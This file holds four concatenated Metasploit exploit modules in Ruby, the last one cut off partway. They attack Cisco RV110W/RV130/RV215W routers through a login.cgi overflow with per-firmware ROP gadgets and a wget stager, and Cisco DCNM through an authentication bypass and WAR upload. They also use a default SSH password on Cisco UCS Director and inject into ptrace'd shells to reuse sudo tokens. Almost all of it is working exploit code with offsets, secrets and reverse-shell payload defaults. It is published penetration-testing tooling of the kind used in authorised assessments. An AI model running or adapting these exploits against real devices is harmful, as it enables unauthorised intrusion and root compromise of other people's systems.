##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Deprecated

  moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',
'Description'    => %q{
        A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,
        Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router
        could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

        The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
        An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

        A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
        system of the affected device as a high-privilege user.

        RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
        RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.

        Note: successful exploitation may not result in a session, and as such,
         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
      },
'Author'         =>
        [
'Yu Zhang', # Initial discovery (GeekPwn conference)
'Haoliang Lu', # Initial discovery (GeekPwn conference)
'T. Shiomitsu', # Initial discovery (Pen Test Partners)
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
        ],
'License'         => MSF_LICENSE,
'Platform'        =>  %w[linux],
'Arch'            =>  [ARCH_ARMLE, ARCH_MIPSLE],
'SessionTypes'    =>  %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged'      => true, # BusyBox
'References'      =>
        [
          ['CVE', '2019-1663'],
          ['BID', '107185'],
          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
          ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']
        ],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
       },
'Targets'        =>
        [
          [ 'Cisco RV110W 1.1.0.9',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af06000,
'libcrypto_base_addr' => 0x2ac01000,
'system_offset'       => 0x00050d40,
'got_offset'          => 0x0009d560,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV110W 1.2.0.9',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af08000,
'libcrypto_base_addr' => 0x2ac03000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV110W 1.2.0.10',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af09000,
'libcrypto_base_addr' => 0x2ac04000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV110W 1.2.1.4',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af54000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV110W 1.2.1.7',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af98000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV130/RV130W < 1.0.3.45',
            {
'offset'          => 446,
'libc_base_addr'  => 0x357fb000,
'system_offset'   => 0x0004d144,
'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
'Arch'            => ARCH_ARMLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/armle/meterpreter_reverse_tcp',
              }
            },
          ],
          [ 'Cisco RV215W 1.1.0.5',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV215W 1.1.0.6',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV215W 1.2.0.14',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a001,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV215W 1.2.0.15',
            {
'offset'              => 69,
'libc_base_addr'      => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x00098db0,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV215W 1.3.0.7',
            {
'offset'              => 77,
'libc_base_addr'      => 0x2afeb000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x000a0530,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
          [ 'Cisco RV215W 1.3.0.8',
            {
'offset'              => 77,
'libc_base_addr'      => 0x2afee000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset'       => 0x0004c7e0,
'got_offset'          => 0x000a0530,
              # gadget 1 is in /usr/lib/libcrypto.so
'gadget1'             => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch'                => ARCH_MIPSLE,
'DefaultOptions'  => {
'PAYLOAD'         => 'linux/mipsle/meterpreter_reverse_tcp',
              }
            }
          ],
        ],
'DisclosureDate'  => 'Feb 27 2019',
'DefaultTarget'   => 0,
'Notes' => {
'Stability'   => [ CRASH_SERVICE_DOWN, ],
      },
    ))
  end

  def p(lib, offset)
    [(lib + offset).to_s(16)].pack('H*').reverse
  end

  def prepare_shellcode(cmd)
    case target
    # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7
    # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8
    when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]
      shellcode = rand_text_alpha(target['offset']) +           # filler
        rand_text_alpha(4) +                                    # $s0
        rand_text_alpha(4) +                                    # $s1
        rand_text_alpha(4) +                                    # $s2
        rand_text_alpha(4) +                                    # $s3
        p(target['libc_base_addr'], target['system_offset']) +  # $s4
        rand_text_alpha(4) +                                    # $s5
        rand_text_alpha(4) +                                    # $s6
        rand_text_alpha(4) +                                    # $s7
        rand_text_alpha(4) +                                    # $s8
        p(target['libcrypto_base_addr'], target['gadget1']) +   # $ra
        p(target['libc_base_addr'], target['got_offset']) +
        rand_text_alpha(28) +
        cmd
      shellcode
    when targets[5] # RV130/RV130W
      shellcode = rand_text_alpha(target['offset']) +           # filler
        p(target['libc_base_addr'], target['gadget1']) +
        p(target['libc_base_addr'], target['system_offset']) +  # r2
        rand_text_alpha(4) +                                    # r6
        p(target['libc_base_addr'], target['gadget2']) +        # pc
        cmd
      shellcode
    end
  end

  def send_request(buffer)
    begin
      send_request_cgi({
'uri'     => '/login.cgi',
'method'  => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
          }
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
    end
  end

  def check

    # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.
    # We use lang_pack/EN.js because it's the one file that changes the most between versions.
    # Note that it's not a smoking gun given that some branches keep the exact same files in /www
    # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)

    fingerprints = {
"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
"version" => "Cisco RV110W 1.1.0.9",
"status" =>Exploit::CheckCode::Vulnerable
      },
"8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
"version" => "Cisco RV110W 1.2.0.9",
"status" => Exploit::CheckCode::Vulnerable
      },
"134ee643ec877641030211193a43cc5e93c96a06" => {
"version" => "Cisco RV110W 1.2.0.10",
"status" => Exploit::CheckCode::Vulnerable
      },
"e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
"version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
      },
"6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
"version" => "Cisco RV130/RV130W 1.0.0.21",
"status" => Exploit::CheckCode::Vulnerable
      },
"9b1a87b752d11c5ba97dd80d6bae415532615266" => {
"version" => "Cisco RV130/RV130W 1.0.1.3",
"status" => Exploit::CheckCode::Vulnerable
      },
"9b6399842ef69cf94409b65c4c61017c862b9d09" => {
"version" => "Cisco RV130/RV130W 1.0.2.7",
"status" => Exploit::CheckCode::Vulnerable
      },
"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
"version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
"status" => Exploit::CheckCode::Vulnerable
      },
"8c8e05de96810a02344d96588c09b21c491ede2d" => {
"version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
      },
"2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
"version" => "Cisco RV215W 1.1.0.5",
"status" => Exploit::CheckCode::Vulnerable
      },
"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
"version" => "Cisco RV215W 1.1.0.6",
"status" => Exploit::CheckCode::Vulnerable
      },
"7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
"version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
"status" => Exploit::CheckCode::Vulnerable
      },
"050d47ea944eaeadaec08945741e8e380f796741" => {
"version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
      }
    }

    uri = target_uri.path
    res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'lang_pack/EN.js')
    })
    if res && res.code == 200
      fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
      if fingerprints.key?(fingerprint)
        print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
        return fingerprints[fingerprint]["status"]
      else
        print_status("Couldn't reliably fingerprint the target.")
      end
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status('Sending request')
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    shellcode = prepare_shellcode(cmd.to_s)
    send_request(shellcode)
  end

  def on_new_session(session)
    # Given there is no process continuation here, the httpd server will stop
    # functioning properly and we need to take care of proper restart
    # ourselves.
    print_status("Reloading httpd service")
    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
    else
      session.shell_command(reload_httpd_service)
    end
  ensure
    super
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
'Description'    => %q{
        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
        directory and achieve remote code execution as root.
        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
        directory for the WAR file upload.
        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
        (see References to understand why).
      },
'Author'         =>
        [
'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
'License'        => MSF_LICENSE,
'References'     =>
        [
          [ 'CVE', '2019-1619' ], # auth bypass
          [ 'CVE', '2019-1620' ], # file upload
          [ 'CVE', '2019-1622' ], # log download
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
        ],
'Platform'       => 'java',
'Arch'           => ARCH_JAVA,
'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
'Cisco DCNM 11.1(1)', {}
          ],
          [
'Cisco DCNM 11.0(1)', {}
          ],
          [
'Cisco DCNM 10.4(2)', {}
          ]
        ],
'Privileged'     => true,
'DefaultOptions' => { 'WfsDelay' => 10 },
'DefaultTarget'  => 0,
'DisclosureDate' => 'Jun 26 2019'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true,  "Default server path", '/']),
        OptString.new('USERNAME', [true,  "Username for auth (required only for 11.0(1) and above", 'admin']),
        OptString.new('PASSWORD', [true,  "Password for auth (required only for 11.0(1) and above", 'admin']),
      ])
  end

  def check
    # at the moment this is the best way to detect
    # check if pmreport and fileUpload servlets return a 500 error with no params
    res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
'vars_get'  =>
      {
'token'  => rand_text_alpha(5..20)
      },
'method' => 'GET'
    )
    if res && res.code == 500
      res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
'method' => 'GET',
      )
      if res && res.code == 500
        return CheckCode::Detected
      end
    end

    CheckCode::Unknown
  end

  def target_select
    if target != targets[0]
      return target
    else
      res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'),
'method' => 'GET'
      )
      if res && res.code == 200
        if res.body.include?('version":"11.1(1)')
          print_good("#{peer} - Detected DCNM 11.1(1)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[1]
        elsif res.body.include?('version":"11.0(1)')
          print_good("#{peer} - Detected DCNM 11.0(1)")
          print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
          return targets[2]
        elsif res.body.include?('version":"10.4(2)')
          print_good("#{peer} - Detected DCNM 10.4(2)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[3]
        else
          print_error("#{peer} - Failed to detect target version.")
          print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
          print_error(res.body)
          print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
          return targets[3]
        end
      end
      fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
    end
  end

  def auth_v11
    res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm/'),
'method' => 'GET',
'vars_get'  =>
      {
'userName'  => datastore['USERNAME'],
'password'  => datastore['PASSWORD']
      },
    )

    if res && res.code == 200
      # get the JSESSIONID cookie
      if res.get_cookies
        res.get_cookies.split(';').each do |cok|
          if cok.include?("JSESSIONID")
            return cok
          end
        end
      end
    end
  end

  def auth_v10
    # step 1: get a JSESSIONID cookie and the server Date header
    res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm/'),
'method' => 'GET'
    )

    # step 2: convert the Date header and create the auth hash
    if res && res.headers['Date']
      jsession = res.get_cookies.split(';')[0]
      date = Time.httpdate(res.headers['Date'])
      server_date = date.strftime("%s").to_i * 1000
      print_good("#{peer} - Got sysTime value #{server_date.to_s}")

      # auth hash format:
      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
      session_id = rand(1000..50000).to_s
      md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
"POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
      md5_str = Base64.strict_encode64(md5)

      # step 3: authenticate our cookie as admin
      # token format: sessionId.sysTime.md5_str.username
      res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm', 'pmreport'),
'cookie' => jsession,
'vars_get'  =>
        {
'token'  => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
        },
'method' => 'GET'
      )

      if res && res.code == 500
        return jsession
      end
    end
  end

  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
  def get_war_path
    res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
'method' => 'GET'
    )

    if res && res.code == 200
      tmp = Tempfile.new
      # we have to drop this into a file first
      # else we will get a Zip::GPFBit3Error if we use an InputStream
      File.binwrite(tmp, res.body)
      Zip::File.open(tmp) do |zis|
        zis.each do |entry|
          if entry.name =~ /jboss[0-9]*\.log/
            fdata = zis.read(entry)
            if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
              tmp.close
              tmp.unlink
              return $1.strip
            end
          end
        end
      end
    end
  end


  def exploit
    target = target_select

    if target == targets[2]
      jsession = auth_v11
    elsif target == targets[3]
      jsession = auth_v10
    end

    # targets[1] DCNM 11.1(1) doesn't need auth!
    if jsession.nil? && target != targets[1]
      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
    elsif target != targets[1]
      print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
    end

    war_path = get_war_path
    if war_path.nil? or war_path.empty?
      fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs")
    else
      print_good("#{peer} - Obtain WAR path from logs: #{war_path}")
    end

    # Generate our payload... and upload it
    app_base = rand_text_alphanumeric(6..16)
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    fname = app_base + '.war'
    post_data = Rex::MIME::Message.new
    post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"")
    post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"")
    post_data.add_part(war_payload,
"application/octet-stream", 'binary',
"form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"")
    data = post_data.to_s

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
'method' => 'POST',
'data'   => data,
'cookie' => jsession,
'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    )

    if res && res.code == 200 && res.body[/#{fname}/]
      print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...")

      sleep 10

      print_status("#{peer} - Executing payload...")
      send_request_cgi(
'uri'    => normalize_uri(target_uri.path, app_base),
'method' => 'GET'
      )
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file")
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
'Name'           => "Cisco UCS Director default scpuser password",
'Description'    => %q{
        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
        via SSH.
        This module  has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
        ],
'References'     =>
        [
          [ 'CVE', '2019-1935' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
        ],
'DefaultOptions'  =>
        {
'EXITFUNC' => 'thread'
        },
'Payload'        =>
        {
'Compat' => {
'PayloadType'    => 'cmd_interact',
'ConnectionType' => 'find'
          }
        },
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Targets'        =>
        [
          [ 'Cisco UCS Director < 6.7.2.0', {} ],
        ],
'Privileged'     => false,
'DefaultTarget'  => 0,
'DisclosureDate' => 'Aug 21 2019'
    ))

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true,  "Username to login with", 'scpuser']),
        OptString.new('PASSWORD', [true,  "Password to login with", 'scpuser']),
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :password        => pass,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end

  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'ptrace Sudo Token Privilege Escalation',
'Description'    => %q{
        This module attempts to gain root privileges by blindly injecting into
        the session user's running shell processes and executing commands by
        calling `system()`, in the hope that the process has valid cached sudo
        tokens with root privileges.

        The system must have gdb installed and permit ptrace.

        This module has been tested successfully on:

        Debian 9.8 (x64); and
        CentOS 7.4.1708 (x64).
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'chaignc', # sudo_inject
'bcoles'   # Metasploit
        ],
'DisclosureDate' => '2019-03-24',
'References'     =>
        [
          ['EDB', '46989'],
          ['URL', 'https://github.com/nongiach/sudo_inject'],
          ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
          ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
          ['URL', 'https://lwn.net/Articles/393012/'],
          ['URL', 'https://lwn.net/Articles/492667/'],
          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
'Platform'       => ['linux'],
'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
'SessionTypes'   => ['shell', 'meterpreter'],
'Targets'        => [['Auto', {}]],
'DefaultOptions' =>
        {
'PrependSetresuid' => true,
'PrependSetresgid' => true,
'PrependFork'      => true,
'WfsDelay'         => 30
        },
'DefaultTarget'  => 0))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def timeout
    datastore['TIMEOUT']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def check
    if yama_enabled?
      vprint_error 'YAMA ptrace scope is restrictive'
      return CheckCode::Safe
    end
    vprint_good 'YAMA ptrace scope is not restrictive'

    if command_exists? '/usr/sbin/getsebool'
      if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
        vprint_error 'SELinux deny_ptrace is enabled'
        return CheckCode::Safe
